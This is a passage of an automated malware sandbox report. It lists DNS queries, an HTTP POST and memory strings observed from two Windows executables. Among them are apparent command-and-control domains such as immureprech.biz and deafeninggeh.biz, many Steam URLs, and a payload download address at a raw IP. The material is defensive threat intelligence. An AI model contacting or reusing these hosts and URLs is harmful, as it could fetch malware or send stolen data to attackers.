https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz

Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008529922.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: wN8pQhRNnu.exe, 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: wN8pQhRNnu.exe, 00000000.00000002.4130656028.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.1758496876.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008529922.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeB
Source: wN8pQhRNnu.exe, 00000000.00000003.1758496876.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/_
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/api
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/apio
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steams
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124600020.0000000000A7F000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/
Source: 5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861926485.0000000000A42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/L_
Source: 5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861926485.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/api
Source: 5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861926485.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/apib
